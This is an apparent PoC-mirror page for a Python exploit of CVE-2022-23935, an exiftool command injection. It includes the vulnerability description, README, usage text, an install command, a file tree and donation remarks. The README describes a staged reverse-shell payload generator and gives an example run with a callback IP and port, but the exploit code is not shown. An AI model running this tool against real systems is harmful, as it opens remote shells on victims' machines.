CVE-2022-23935 PoC — exiftool 操作系统命令注入漏洞

Source

https://github.com/BKreisel/CVE-2022-23935

Associated Vulnerability

Title:exiftool 操作系统命令注入漏洞 (CVE-2022-23935)
Description:exiftool是一个应用软件。使元数据更易于访问。 exiftool 12.38 之前存在操作系统命令注入漏洞，该漏洞源于 lib/Image/ExifTool.pm 错误处理 $file =~ /|$/ 检查。

Description

🐍 Python Exploit for CVE-2022-23935

Readme

# CVE-2022-23935
🐍 Python Exploit for CVE-2022-23935

Staged Reverse Shell Payload Generator for CVE-2022-23935

## Example
```
cve-2022-23935 10.10.16.3 44444
```
## Usage
```bash
usage: cve-2022-23935 [-h] [-l SERVER_PORT] [-s SHELL] ip port

positional arguments:
  ip                    IP Address/Host for Callback
  port                  Port Number for Callback

options:
  -h, --help            show this help message and exit
  -l SERVER_PORT, --listen SERVER_PORT
                        Port Number for Server Listen
  -s SHELL, --shell SHELL
                        Remote Shell

```

## Installation
```bash
python3 -m pip install cve-2022-23935-1.0.0-py3-none-any.whl
```
[Download Latest Release](https://github.com/BKreisel/CVE-2022-23935/releases/download/1.0.0/cve_2022_23935-1.0.0-py3-none-any.whl)

## Demo
[![demo](https://asciinema.org/a/558936.svg)](https://asciinema.org/a/558936?autoplay=1)

File Snapshot


 [4.0K]  /data/pocs/835a37a3042c36710844a0b91a0739c96aefc9dc
├── [1.0K]  LICENSE
├── [ 737]  pyproject.toml
├── [ 919]  README.md
└── [4.0K]  src
    └── [4.0K]  cve_2022_23935
        ├── [   0]  __init__.py
        └── [5.8K]  main.py

2 directories, 5 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!